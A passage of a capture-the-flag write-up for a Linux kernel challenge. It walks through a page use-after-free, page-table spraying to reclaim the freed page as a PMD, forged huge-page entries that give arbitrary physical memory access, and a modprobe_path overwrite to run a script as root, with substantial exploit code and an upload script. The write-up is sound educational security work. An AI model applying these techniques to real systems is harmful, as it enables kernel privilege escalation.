6), huge page (bit 7). That\u0026rsquo;s \\(\\texttt{0b11100111} = \\texttt{0xE7}\\). This single 8-byte value gives userspace full read-write access to 2MB of contiguous physical memory.\nTLB caching and invalidation # The page table walk is expensive: four sequential memory reads just to translate one virtual address. To avoid doing this on every memory access, the CPU caches recent translations in the TLB (Translation Lookaside Buffer). When we modify page table entries, stale TLB entries can cause the CPU to use the old translation.\nThe TLB must be explicitly invalidated. On x86-64, writing to the CR3 register flushes the entire TLB (on CPUs without PCID (Process Context Identifiers), which includes our qemu64). 
The kernel reloads CR3 on every context switch, and with KPTI it also swaps CR3 on every user/kernel transition (syscall entry and return included), so a simple syscall like getpid() acts as a full TLB flush:\nstatic inline void tlb_flush(void) { getpid(); } After modifying a PMD entry via our UAF and calling getpid(), the next memory access through the corresponding virtual address will walk the page tables fresh and see our modified entry.\nHow page table pages get allocated # When the kernel needs to create a new page table entry (for example, when you mmap a new region and then touch it for the first time), it needs physical pages to hold the table itself. These page table pages come from the same page allocator that serves alloc_page(). The kernel calls functions like pte_alloc_one and pmd_alloc which internally call alloc_page(GFP_KERNEL) (or a similar variant) to get a fresh page.\nThis is the key insight for the exploit: our freed page goes back to the same pool that the kernel draws from when it needs new page table pages. If we can trigger the right allocation pattern, we can get the kernel to reuse our freed page as a PMD page. Then our UAF pointer directly reads and writes PMD entries, and we can craft arbitrary huge page mappings.\nExploit strategy # Now that we understand the moving parts, here\u0026rsquo;s the plan:\nUAF: Allocate a page, mmap it, free it. We get R/W access to a freed physical page. PMD reclaim: Spray page table allocations so the freed page gets reclaimed as a PMD page. PMD identification: Figure out which virtual address range our PMD governs. Forge huge pages: Write 2MB huge page entries into the PMD, creating a window over arbitrary physical memory. Find modprobe_path: Scan physical memory for the /sbin/modprobe string. Overwrite: Replace it with /tmp/x, a script that copies the flag. Trigger: Execute a file with invalid magic bytes. The kernel runs our script as root. 
Phase 1: Obtaining the UAF # This is straightforward, as described above:\nint fd = open(\u0026#34;/dev/phantom\u0026#34;, O_RDWR); ioctl(fd, CMD_ALLOC, 0); volatile uint64_t *uaf = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0); ioctl(fd, CMD_FREE, 0); At this point, uaf points to a 4KB page that\u0026rsquo;s been returned to the kernel\u0026rsquo;s free list. The page was filled with 0x41 bytes by the driver\u0026rsquo;s alloc handler, so if nothing has reused it yet, we\u0026rsquo;d see 0x4141414141414141 at every qword.\nPhase 2: Reclaiming the page as a PMD # We need the kernel to allocate our freed page as a PMD page. The kernel\u0026rsquo;s page table allocator draws from the same buddy allocator free lists as alloc_pages(). When a process touches a virtual address that doesn\u0026rsquo;t have page table structures built out yet, the kernel\u0026rsquo;s page fault handler walks the existing tables, discovers the gap, and allocates new table pages to fill it.\nThe specific call chain for PMD allocation:\nhandle_page_fault() → handle_mm_fault() → __handle_mm_fault() → __pmd_alloc() // allocates if PMD page is missing → pmd_alloc_one() → alloc_page(GFP_PGTABLE_USER) // GFP_PGTABLE_USER ≈ GFP_KERNEL pmd_alloc_one() ultimately calls alloc_pages() with order 0—the exact same allocator and order as our freed page. The freed page sits in the buddy allocator\u0026rsquo;s order-0 free list, and these PMD page allocations pull from that same list.\nThe strategy: mmap 1024 small mappings spaced exactly 2MB apart in virtual address space, then write to each one. The mmap call with MAP_ANONYMOUS just reserves the virtual address range — Linux is lazy and doesn\u0026rsquo;t allocate physical memory or build page tables until you actually access the address. The write (*(volatile uint64_t *)p = ...) 
is what forces the kernel\u0026rsquo;s hand: it triggers a page fault, the kernel walks the page tables, discovers it needs to create new table pages to hold the mapping, and allocates them from the buddy allocator. That\u0026rsquo;s how we get the kernel to pull pages from the same free list where our UAF page is sitting.\n#define SPRAY_BASE 0x40000000UL // 1GB mark #define SPRAY_STRIDE 0x200000UL // 2MB for (int i = 0; i \u0026lt; 1024; i++) { void *addr = (void *)(SPRAY_BASE + (uint64_t)i * SPRAY_STRIDE); void *p = mmap(addr, 0x1000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, -1, 0); if (p != MAP_FAILED) *(volatile uint64_t *)p = 0xCAFE0000ULL + i; // write triggers page fault } Why 2MB stride forces PMD allocations # Each PMD entry covers \\(2^{21} = \\text{2MB}\\) of virtual address space (bits 29:21 of the virtual address select the PMD entry). A single PMD page holds \\(2^9 = 512\\) entries (\\(512 \\times 8\\text{ bytes} = 4096\\text{ bytes} = \\text{one page}\\)), covering \\(512 \\times \\text{2MB} = \\text{1GB}\\) of virtual address space.\nMappings within the same 2MB region share the same PMD entry—they differ only in bits 20:0, which index into the PTE page pointed to by that PMD entry. But mappings in different 2MB regions need different PMD entries. If those PMD entries are in different PMD pages (because they span more than 1GB), the kernel must allocate multiple PMD pages.\nBy spacing 1024 mappings exactly 2MB apart, we span addresses 0x40000000 through 0xBFFFF000:\nMapping 0: 0x040000000 → PMD page A, entry 0 (0x40000000 \u0026gt;\u0026gt; 21 = 512, mod 512 = 0) Mapping 1: 0x040200000 → PMD page A, entry 1 ... Mapping 511: 0x07FE00000 → PMD page A, entry 511 Mapping 512: 0x080000000 → PMD page B, entry 0 (crosses 1GB boundary) ... Mapping 1023: 0x0BFE00000 → PMD page B, entry 511 Before our spray, this address range was unused. 
The PGD and PUD entries for it may or may not exist, but the PMD pages definitely don\u0026rsquo;t. When we touch each mapping, the kernel:\nTakes a page fault (the PTE is missing) Walks from CR3 → PGD → PUD → PMD → discovers the PMD entry is empty Allocates a new PTE page to hold the mapping If the PMD page itself doesn\u0026rsquo;t exist yet (first touch in this 1GB range), allocates a new PMD page too The PMD page allocations (at most 2 for 1024 mappings across 2GB) are what we want. But note: the spray also allocates 1024 PTE pages (one per mapping, since each mapping is in a different 2MB region) and 1024 data pages (the anonymous pages that back our written values). That\u0026rsquo;s \\(1024 + 1024 + 2 \\approx 2050\\) page allocations, creating plenty of demand from the buddy allocator.\nWith 256MB of RAM and a minimal busybox system, the free page pool contains on the order of \\(\\sim\\!50{,}000\\) free pages. Our freed page is one of them. The \\(\\sim\\!2050\\) allocations during the spray have a high probability of grabbing it, and we specifically want it grabbed as a PMD page (not as a data page or PTE page). Since the PMD page allocations happen early in the spray (as soon as the first mapping in each 1GB range is touched), and our recently-freed page is likely near the head of the free list (the buddy allocator uses LIFO within each free list), the probability is high.\nVerifying reclamation # After the spray, we check the UAF pointer to see what\u0026rsquo;s there:\nint count = 0; for (int i = 0; i \u0026lt; 512; i++) { uint64_t v = uaf[i]; if (v \u0026amp;\u0026amp; v != 0x4141414141414141ULL \u0026amp;\u0026amp; (v \u0026amp; PT_PRESENT) \u0026amp;\u0026amp; (v \u0026amp; PT_USER)) count++; } If the page was reclaimed as a PMD, its 512 qwords are no longer 0x4141414141414141. Instead, they\u0026rsquo;re PTE page physical addresses with flag bits set. 
Each PMD entry points to a PTE page, and the entries have at least Present (bit 0) and User (bit 2) set. A successful PMD reclaim shows a high count—ideally 512/512 since we touched a mapping in every 2MB slot.\nThere\u0026rsquo;s an ambiguity here: we can\u0026rsquo;t easily tell from the entry values alone whether our page was reclaimed as a PMD page (entries point to PTE pages) or a PTE page (entries point to data pages). Both types of entries have Present and User set, and both contain physical addresses in the upper bits. The verification step doesn\u0026rsquo;t try to distinguish — it just confirms the page contains page table entries of some kind, not 0x41 fill data. Phase 3 resolves the ambiguity by probing from userspace: we write a huge page entry and observe whether it actually changes address translation, which only works if we control a PMD page.\nIf the count is low (say \\(\u0026lt; 64\\)), the page wasn\u0026rsquo;t reclaimed as a page table at all — maybe it became an anonymous data page or page cache page. In that case, we\u0026rsquo;d need to retry the entire exploit.\nPhase 3: Identifying the PMD\u0026rsquo;s virtual address range # We know our UAF page is a PMD page, but we don\u0026rsquo;t know which one. Our spray covers two 1GB ranges, so the page is either the PMD for 0x40000000–0x7FFFFFFF or for 0x80000000–0xBFFFFFFF. We need to know the exact base address so we can calculate the relationship: PMD entry i controls the 2MB virtual range starting at virt_base + i * 0x200000.\nThe trick: temporarily corrupt a PMD entry and observe the effect from userspace. 
We replace PMD entry 0 with a 2MB huge page entry mapping physical address 0:\nuint64_t saved = uaf[0]; uaf[0] = 0xE7; // phys_addr=0 | P|RW|US|A|D|PS getpid(); // flush TLB (CR3 reload via syscall) The value 0xE7 as a PMD entry means:\nbits 51:21 = 0x0 → physical base address 0 (first 2MB of RAM) bit 7 = 1 (PS) → this is a 2MB huge page, skip PTE level bit 6 = 1 (D) → dirty bit 5 = 1 (A) → accessed bit 2 = 1 (U/S) → userspace-accessible bit 1 = 1 (R/W) → writable bit 0 = 1 (P) → present After the TLB flush, whichever 2MB virtual range was governed by PMD entry 0 no longer maps to a PTE page and its associated data pages. Instead, it maps directly to physical addresses 0x000000–0x1FFFFF (the first 2MB of physical RAM — BIOS data, real-mode IVT, etc.).\nNow we test: read from SPRAY_BASE (the first address in our spray). During Phase 2, we wrote 0xCAFE0000 there, and under normal translation (PMD → PTE → data page) we\u0026rsquo;d read that value back. But if SPRAY_BASE falls in the 2MB range we just redirected to physical address 0, the read goes to physical RAM instead and returns whatever is there (certainly not 0xCAFE0000). A mismatch tells us this address range is governed by our PMD:\nvolatile uint64_t probe = *(volatile uint64_t *)SPRAY_BASE; uaf[0] = saved; // restore original PMD entry (points back to PTE page) getpid(); // flush again to restore normal translation if (probe != 0xCAFE0000ULL) { // SPRAY_BASE is governed by our PMD entry 0 virt_base = SPRAY_BASE; } If SPRAY_BASE still reads 0xCAFE0000, then it\u0026rsquo;s governed by the other PMD page (the one we don\u0026rsquo;t control). We try the second candidate:\n// Try the second 1GB range saved = uaf[0]; uaf[0] = 0xE7; getpid(); probe = *(volatile uint64_t *)(SPRAY_BASE + 512 * 0x200000); uaf[0] = saved; getpid(); if (probe != (0xCAFE0000ULL + 512)) virt_base = SPRAY_BASE + 512 * 0x200000; One of the two candidates will hit. 
This probe is safe because we immediately restore the original PMD entry: the corruption is transient, lasting only for the single read. Even if a signal or interrupt occurs during the window, the worst case is reading from low physical memory (the BIOS/real-mode area), which is mapped and readable.\nOnce identified, the relationship is fixed and deterministic: virtual address virt_base + i * 0x200000 is translated through uaf[i]. Modifying uaf[i] changes where that virtual address points in physical memory. This is the core primitive that drives the rest of the exploit.\nPhase 4: Arbitrary physical memory access # This is where the exploit becomes powerful. Assuming reclamation succeeded (Phase 2 verified this, Phase 3 confirmed it\u0026rsquo;s a PMD), we have a full PMD page: 512 entries, each controlling \\(\\text{2MB}\\) of virtual-to-physical translation. Our spray populated all 512 slots (one mapping per 2MB region), so every entry contains a valid PTE page pointer. We can overwrite any of them. By writing physical_address | 0xE7 into an entry, we replace the normal PMD → PTE → data page translation with a direct 2MB huge page mapping to arbitrary physical memory. After a TLB flush, reads and writes through the corresponding virtual address go directly to the chosen physical RAM.\nThe reclamation is probabilistic — there\u0026rsquo;s no guarantee the freed page becomes a PMD page rather than a data page or PTE page. But with only 256MB of RAM and LIFO free list behavior, the probability is high. 
The exploit exits early and asks for a retry if reclamation fails; in practice it succeeds on the first attempt most of the time.\nThe flags we use (0xE7) create a maximally permissive entry:\n#define PMD_HUGE 0xE7ULL // Bit 0 (P): Present // Bit 1 (R/W): Read-write // Bit 2 (U/S): User-accessible (critical: without this, userspace reads would fault) // Bit 5 (A): Accessed (pre-set to avoid hardware setting it later) // Bit 6 (D): Dirty (pre-set to avoid write-protection faults) // Bit 7 (PS): Page Size = 1 → 2MB huge page (skip PTE level) Pre-setting the Accessed and Dirty bits avoids hardware interference. When the CPU accesses a page whose A bit is clear, it performs a read-modify-write on the page table entry to set it. Same for the D bit on the first write. These are atomic hardware operations on the PMD entry — but we\u0026rsquo;re modifying entries through a UAF mapping, so a concurrent hardware write could race with our changes. Pre-setting both bits means the CPU sees them already set and leaves the entry alone.\nThe naive approach and why it failed # The obvious approach: iterate through physical memory in 2MB chunks, each time setting uaf[0] to a new physical address, flushing the TLB, and reading through virt_base:\n// This doesn\u0026#39;t work reliably! for (int chunk = 0; chunk \u0026lt; 128; chunk++) { uaf[0] = (chunk * 0x200000UL) | 0xE7; getpid(); // TLB flush // read through virt_base... } This should work in theory—writing CR3 flushes the entire TLB on CPUs without PCID, and our QEMU qemu64 CPU doesn\u0026rsquo;t support PCID. But in practice, QEMU\u0026rsquo;s software MMU emulation has a subtlety: repeatedly overwriting the same PMD slot with different huge page entries and flushing between each doesn\u0026rsquo;t always produce fully fresh translations. 
The QEMU softmmu TLB is a software structure that gets invalidated on CR3 writes, but the invalidation granularity or timing doesn\u0026rsquo;t perfectly match real hardware behavior. We observed stale reads where the data from a previous chunk appeared at addresses that should reflect the new mapping.\nOn real hardware with real TLBs, this sequential approach would work. But we\u0026rsquo;re in QEMU, so we need a workaround.\nThe parallel PMD approach # The solution is elegant: avoid reusing the same PMD entry index entirely. Instead of modifying entry 0 for each chunk, we set up all 128 entries simultaneously, each pointing to a different 2MB physical chunk:\n// 256MB RAM = 128 chunks of 2MB uint64_t saved_pmds[MAX_CHUNKS]; for (int chunk = 0; chunk \u0026lt; MAX_CHUNKS; chunk++) { saved_pmds[chunk] = uaf[chunk]; // save original PTE-page pointer uaf[chunk] = ((uint64_t)chunk * 0x200000UL) | PMD_HUGE; // huge page → phys chunk } getpid(); // single TLB flush After this single setup and one TLB flush, the first 128 entries of our PMD page create a linear map of all physical memory:\nPMD entry Virtual address Maps to physical uaf[0] virt_base + 0 * 2MB 0x000000 – 0x1FFFFF uaf[1] virt_base + 1 * 2MB 0x200000 – 0x3FFFFF uaf[2] virt_base + 2 * 2MB 0x400000 – 0x5FFFFF \u0026hellip; \u0026hellip; \u0026hellip; uaf[127] virt_base + 127 * 2MB 0xFE00000 – 0xFFFFFFF All \\(\\text{256MB}\\) of physical RAM is now simultaneously accessible as a contiguous \\(\\text{256MB}\\) virtual region. Each PMD entry is used only once, so every translation is fresh—no TLB staleness. We can scan the entire physical address space in a single pass without any additional TLB flushes.\nThis is conceptually similar to the kernel\u0026rsquo;s own direct map (page_offset_base), except we\u0026rsquo;ve constructed it from userspace by forging page table entries. 
The kernel\u0026rsquo;s SMEP/SMAP protections are irrelevant here: those prevent the kernel from executing or accessing userspace pages, not the other way around. We\u0026rsquo;re in userspace, accessing physical memory through valid (forged) page table entries. The MMU hardware enforces the page table, and our entries say \u0026ldquo;user-accessible, read-write.\u0026rdquo;\nPhase 5: Finding modprobe_path # We have arbitrary physical memory read/write. Now we need a target — something in kernel memory we can overwrite to escalate privileges.\nmodprobe is a userspace utility that loads kernel modules (.ko files). When the kernel needs a module it doesn\u0026rsquo;t have — for example, a filesystem driver or a network protocol — it doesn\u0026rsquo;t load the module directly. Instead, it spawns a userspace process that runs the modprobe binary, which resolves dependencies and loads the module via the init_module/finit_module syscalls. The kernel stores the path to this utility in a global variable called modprobe_path, defaulting to \u0026quot;/sbin/modprobe\u0026quot;.\nThe reason we care: modprobe_path is a writable string in kernel memory, and the kernel executes whatever path it contains as root. If we can overwrite it to point at a script we control, the kernel will run our script with full root privileges. We just need a way to trigger the kernel into calling modprobe — which turns out to be easy (Phase 6 covers this). First, we need to find the string in physical memory.\nThe variable is defined as:\n// kernel/module/kmod.c char modprobe_path[KMOD_PATH_LEN] = CONFIG_MODPROBE_PATH; // KMOD_PATH_LEN = 256, CONFIG_MODPROBE_PATH = \u0026#34;/sbin/modprobe\u0026#34; It\u0026rsquo;s a 256-byte char array in the kernel\u0026rsquo;s .data section (writable data, not .rodata). The default value is \u0026quot;/sbin/modprobe\u0026quot; (15 bytes including the null terminator), followed by \\(256 - 15 = 241\\) bytes of zeros. 
We need to find its physical address so we can overwrite it.\nWhy the offset within 2MB is fixed # KASLR randomizes the kernel\u0026rsquo;s base address, both virtual (_text) and physical (where in RAM the kernel image is loaded). However, the physical placement is always aligned to at least 2MB (CONFIG_PHYSICAL_ALIGN), and typically to a larger power of two. This means the kernel\u0026rsquo;s physical base address is always \\(N \\times \\texttt{0x200000}\\) for some integer \\(N\\).\nSince modprobe_path is at a fixed offset from the kernel\u0026rsquo;s base, and the base is 2MB-aligned, modprobe_path\u0026rsquo;s offset within its 2MB physical chunk is constant regardless of KASLR. Given the symbol\u0026rsquo;s virtual address offset from _text:\n0x1b3f5c0 % 0x200000 = 0x1b3f5c0 \u0026amp; 0x1FFFFF = 0x13f5c0 To extract this offset, we decompress vmlinux from the bzImage (using extract-vmlinux or similar) and look up the symbol in the symbol table. The exact offset depends on the kernel build, but for this challenge\u0026rsquo;s kernel 6.6.15, it\u0026rsquo;s 0x13f5c0.\nThe fast scan # With all 128 PMD entries already set up as huge pages (from Phase 4), we have a 256MB window into physical RAM. 
We just check offset 0x13f5c0 in each 2MB chunk — only \\(128\\) memory reads to search the entire physical address space:\n#define KNOWN_OFF 0x13f5c0 for (int chunk = 0; chunk \u0026lt; MAX_CHUNKS \u0026amp;\u0026amp; !found; chunk++) { volatile char *w = (volatile char *)(virt_base + (uint64_t)chunk * PAGE_2M); // Quick pre-filter: check key characters before full comparison if (w[KNOWN_OFF] == \u0026#39;/\u0026#39; \u0026amp;\u0026amp; w[KNOWN_OFF+1] == \u0026#39;s\u0026#39; \u0026amp;\u0026amp; w[KNOWN_OFF+5] == \u0026#39;/\u0026#39; \u0026amp;\u0026amp; w[KNOWN_OFF+6] == \u0026#39;m\u0026#39;) { // Full 14-byte comparison: \u0026#34;/sbin/modprobe\u0026#34; const char *ref = \u0026#34;/sbin/modprobe\u0026#34;; int ok = 1; for (int j = 0; j \u0026lt; 14 \u0026amp;\u0026amp; ok; j++) if (w[KNOWN_OFF + j] != ref[j]) ok = 0; if (ok) { mod_phys = (uint64_t)chunk * PAGE_2M + KNOWN_OFF; found = 1; } } } The pre-filter checks 4 strategic characters first (/, s, /, m) to avoid the full 14-byte comparison on every chunk. In practice, only one chunk contains /sbin/modprobe at this exact offset, so the pre-filter immediately rejects \\(127\\) of \\(128\\) chunks.\nThe exploit also includes a slow-scan fallback that does a byte-by-byte search through each 2MB chunk, in case the KNOWN_OFF calculation is wrong. Note that the fallback uses the sequential single-slot approach (rewriting uaf[scan_idx] in a loop) that we identified as unreliable in QEMU — so it may suffer from the same TLB staleness issues. It\u0026rsquo;s a last resort; in practice, the fast scan always succeeds.\nAfter the scan, we restore all 128 PMD entries and flush:\nfor (int chunk = 0; chunk \u0026lt; MAX_CHUNKS; chunk++) uaf[chunk] = saved_pmds[chunk]; getpid(); The process\u0026rsquo;s page tables are back to normal. 
Our spray mappings work as before—the original PMD entries (which pointed to PTE pages holding our 0xCAFE0000 + i data pages) are restored.\nPhase 6: Overwriting modprobe_path # How modprobe_path gets executed # When a process calls execve() on a file, the kernel inspects the file\u0026rsquo;s first few bytes (the \u0026ldquo;magic number\u0026rdquo;) to determine its format. ELF binaries start with \\x7fELF, shell scripts start with #!, and so on. The kernel iterates through its registered binary handlers (search_binary_handler):\n// fs/exec.c (simplified) static int search_binary_handler(struct linux_binprm *bprm) { list_for_each_entry(fmt, \u0026amp;formats, lh) { retval = fmt-\u0026gt;load_binary(bprm); if (retval != -ENOEXEC) return retval; // handler claimed it } // No handler matched → try to load a binfmt module request_module(\u0026#34;binfmt-%04x\u0026#34;, *(unsigned short *)(bprm-\u0026gt;buf + 2)); // ... retry handlers ... } If no handler recognizes the format, request_module() tries to load a kernel module that might handle it. This calls __request_module() → call_modprobe():\n// kernel/module/kmod.c (simplified) static int call_modprobe(char *module_name, int wait) { char *argv[] = { modprobe_path, \u0026#34;-q\u0026#34;, \u0026#34;--\u0026#34;, module_name, NULL }; struct subprocess_info *info; info = call_usermodehelper_setup(modprobe_path, argv, ...); return call_usermodehelper_exec(info, wait); } call_usermodehelper_exec() spawns a new kernel thread that transitions to userspace and execve()s the path at modprobe_path. This execution happens with full root privileges (uid 0, gid 0, all capabilities). 
It\u0026rsquo;s a kernel-internal mechanism that predates any namespace or security module filtering in most configurations.\nThe full call chain:\nexecve(\u0026#34;/tmp/dummy\u0026#34;) ← userspace (uid 1000) → do_execve() → do_execveat_common() → bprm_execve() → exec_binprm() → search_binary_handler() → [no handler matches 0xffffffff magic] → request_module(\u0026#34;binfmt-ffff\u0026#34;) → call_modprobe(\u0026#34;binfmt-ffff\u0026#34;) → call_usermodehelper_setup(modprobe_path, ...) → call_usermodehelper_exec(...) ← kernel thread → execve(modprobe_path) as root ← root context! If we overwrite modprobe_path from \u0026quot;/sbin/modprobe\u0026quot; to \u0026quot;/tmp/x\u0026quot;, the kernel will execute /tmp/x as root. We control /tmp/x.\nThe overwrite # First, prepare a payload script that copies the flag:\nsystem(\u0026#34;echo \u0026#39;#!/bin/sh\\ncp /flag /tmp/flag\\nchmod 777 /tmp/flag\u0026#39;\u0026#34; \u0026#34; \u0026gt; /tmp/x \u0026amp;\u0026amp; chmod +x /tmp/x\u0026#34;); This creates /tmp/x containing:\n#!/bin/sh cp /flag /tmp/flag chmod 777 /tmp/flag Then we set up a single PMD entry to map the 2MB chunk containing modprobe_path and write over the string:\n// Calculate which 2MB chunk contains modprobe_path uint64_t mod_chunk = (mod_phys / PAGE_2M) * PAGE_2M; // 2MB-aligned base int mod_off = mod_phys - mod_chunk; // offset within chunk // Map the chunk via PMD entry 0 uaf[0] = mod_chunk | PMD_HUGE; getpid(); // TLB flush // Overwrite the string in physical memory volatile char *p = (volatile char *)virt_base + mod_off; p[0]=\u0026#39;/\u0026#39;; p[1]=\u0026#39;t\u0026#39;; p[2]=\u0026#39;m\u0026#39;; p[3]=\u0026#39;p\u0026#39;; p[4]=\u0026#39;/\u0026#39;; p[5]=\u0026#39;x\u0026#39;; p[6]=\u0026#39;\\0\u0026#39;; // Restore and flush uaf[0] = saved_pmd; getpid(); We write byte-by-byte rather than using memcpy to avoid any potential issues with word-tearing or compiler optimization on a volatile pointer. 
The original string \u0026quot;/sbin/modprobe\\0\u0026quot; is 15 bytes; we overwrite the first 7 bytes with \u0026quot;/tmp/x\\0\u0026quot;. The null terminator at byte 6 ends the C string — the remaining bytes (odprobe\\0...) are past the terminator and never read.\nWe\u0026rsquo;re writing directly to the kernel\u0026rsquo;s .data section through physical memory, bypassing all kernel protections:\nSMEP/SMAP: Only prevent the kernel from executing/accessing userspace pages. They don\u0026rsquo;t prevent userspace from accessing kernel memory. KASLR: Randomizes virtual addresses, but we\u0026rsquo;re working with physical addresses discovered by scanning. Read-only mappings: The kernel\u0026rsquo;s virtual mapping of .data is read-write (it\u0026rsquo;s not .rodata), but even if it weren\u0026rsquo;t, we\u0026rsquo;re accessing the physical memory directly through our forged PMD entry. The kernel\u0026rsquo;s page table permissions for its own mapping of this page are irrelevant—we have our own mapping with different permissions. W^X / CONFIG_STRICT_KERNEL_RWX: This makes kernel .text non-writable via the kernel\u0026rsquo;s own page tables. But again, our forged PMD bypasses the kernel\u0026rsquo;s page tables entirely. We\u0026rsquo;re creating an independent, parallel mapping to the same physical memory.\nPhase 7: Trigger and flag # Execute a file with an unrecognized magic number. 
Four 0xFF bytes don\u0026rsquo;t match any known binary format handler:\nsystem(\u0026#34;echo -ne \u0026#39;\\\\xff\\\\xff\\\\xff\\\\xff\u0026#39; \u0026gt; /tmp/dummy\u0026#34; \u0026#34; \u0026amp;\u0026amp; chmod +x /tmp/dummy\u0026#34; \u0026#34; \u0026amp;\u0026amp; /tmp/dummy 2\u0026gt;/dev/null; true\u0026#34;); usleep(100000); // wait for usermode helper to run system(\u0026#34;cat /tmp/flag 2\u0026gt;/dev/null || echo \u0026#39;[-] no flag\u0026#39;\u0026#34;); The magic bytes 0xFFFFFFFF are chosen deliberately:\nNot \\x7fELF (ELF) Not #! (script) Not \\x00asm (wasm, if configured) Not any other registered binfmt magic The ; true after /tmp/dummy ensures the system() call returns success even though execve fails. The 2\u0026gt;/dev/null suppresses the \u0026ldquo;exec format error\u0026rdquo; message. The usleep(100000) (100ms) gives the kernel\u0026rsquo;s usermode helper thread time to spawn and execute /tmp/x asynchronously.\nThe kernel\u0026rsquo;s sequence: execve(\u0026quot;/tmp/dummy\u0026quot;) fails to find a handler, triggers request_module(\u0026quot;binfmt-ffff\u0026quot;), which runs modprobe_path (now \u0026quot;/tmp/x\u0026quot;) as root. Our script copies /flag to /tmp/flag with mode 777. We read it from our unprivileged context.\nRemote deployment # The remote gives a busybox shell inside the QEMU VM over netcat. There\u0026rsquo;s no scp, wget, curl, or any file transfer tool. The only way to get a binary onto the VM is to echo base64-encoded chunks through the shell.\nThe binary size problem # A statically linked glibc binary is 721KB. The size breakdown:\n721KB total (gcc -static) ~450KB glibc internal code (locale, nsswitch, pthread, math) ~200KB libc startup, stdio, malloc, string ops ~70KB our actual exploit code After gzip compression and base64 encoding: \\(721\\text{KB} \\to 320\\text{KB} \\to 427\\text{KB}\\) base64 → 446 echo commands at 960 bytes each. 
Each command is sent over the network, processed by the shell, and appended to a file. With network latency and shell processing overhead, the upload takes 30-60 seconds. The remote VM has a session timeout, and our first attempts uploaded successfully but the connection was killed before the exploit could start running.\nmusl-gcc to the rescue # Switching to musl libc produces dramatically smaller static binaries. musl was designed for correctness and minimal binary size in static linking, without glibc\u0026rsquo;s enormous infrastructure (no NSS, no iconv tables, no locale machinery, no libpthread bloat):\nmusl-gcc -static -Os -s -o exploit exploit.c glibc musl Binary size 721 KB 39 KB Gzipped 320 KB 17 KB Base64 427 KB 23 KB Echo chunks 446 25 \\(18\\times\\) smaller. The upload completes in under 2 seconds, leaving the entire session timeout for the exploit.\nThe flags: -Os optimizes for size (shorter instruction sequences, less inlining). -s strips the symbol table and debug info. -static links musl statically (no dynamic linker needed in the VM). The combination produces a minimal self-contained binary.\nUpload pipeline # The solve script compresses, base64-encodes, chunks, and uploads:\ncompressed = gzip.compress(data, compresslevel=9) b64 = base64.b64encode(compressed).decode() # Upload in 960-byte chunks via echo -n append r.sendline(b\u0026#34;cat /dev/null \u0026gt; /tmp/b64\u0026#34;) # initialize file for chunk in chunks: r.sendline(f\u0026#34;echo -n \u0026#39;{chunk}\u0026#39;\u0026gt;\u0026gt;/tmp/b64\u0026#34;.encode()) # Decode: base64 → gzip → binary r.sendline(b\u0026#34;base64 -d /tmp/b64 \u0026gt; /tmp/e.gz \u0026amp;\u0026amp; gzip -d /tmp/e.gz \u0026#34; b\u0026#34;\u0026amp;\u0026amp; mv /tmp/e /tmp/exploit \u0026amp;\u0026amp; chmod +x /tmp/exploit\u0026#34;) Two subtle gotchas discovered during development:\nBusybox\u0026rsquo;s gunzip requires .gz extension. 
Unlike GNU gzip, busybox\u0026rsquo;s implementation refuses to decompress files that don\u0026rsquo;t end in .gz. Piping (base64 -d | gzip -d \u0026gt; file) works as a workaround, but saving as .gz and then decompressing was more reliable across different busybox builds.\nChunk size matters. Chunks larger than ~1000 bytes can hit shell line-length limits or cause echo to misbehave on some busybox configurations. 960 bytes (divisible by 4 for clean base64) is a safe sweet spot.\nThe periodic echo SYNC / recvuntil(\u0026quot;SYNC\u0026quot;) synchronization in the solve script prevents the send buffer from overflowing: if we send all 25 chunks at full speed without waiting, some shells drop input.\nSolve scripts # exploit.c #define _GNU_SOURCE #include \u0026lt;stdio.h\u0026gt; #include \u0026lt;stdlib.h\u0026gt; #include \u0026lt;string.h\u0026gt; #include \u0026lt;fcntl.h\u0026gt; #include \u0026lt;unistd.h\u0026gt; #include \u0026lt;sys/ioctl.h\u0026gt; #include \u0026lt;sys/mman.h\u0026gt; #include \u0026lt;stdint.h\u0026gt; #define CMD_ALLOC 0x133701 #define CMD_FREE 0x133702 #define DEVICE \u0026#34;/dev/phantom\u0026#34; #define PAGE_SIZE 0x1000 #define PAGE_2M 0x200000UL #define SPRAY_COUNT 1024 #define SPRAY_BASE 0x40000000UL #define SPRAY_STRIDE PAGE_2M #define PMD_HUGE 0xE7ULL #define PT_PRESENT (1ULL \u0026lt;\u0026lt; 0) #define PT_USER (1ULL \u0026lt;\u0026lt; 2) #define MAX_CHUNKS 128 static void die(const char *m) { perror(m); exit(1); } static inline void tlb_flush(void) { getpid(); } int main(void) { int dev_fd; volatile uint64_t *uaf; setbuf(stdout, NULL); setbuf(stderr, NULL); printf(\u0026#34;[*] Phantom exploit\\n\u0026#34;); /* ---- UAF ---- */ dev_fd = open(DEVICE, O_RDWR); if (dev_fd \u0026lt; 0) die(\u0026#34;open\u0026#34;); if (ioctl(dev_fd, CMD_ALLOC, 0) \u0026lt; 0) die(\u0026#34;alloc\u0026#34;); uaf = mmap(NULL, PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_SHARED, dev_fd, 0); if (uaf == MAP_FAILED) die(\u0026#34;mmap\u0026#34;); if 
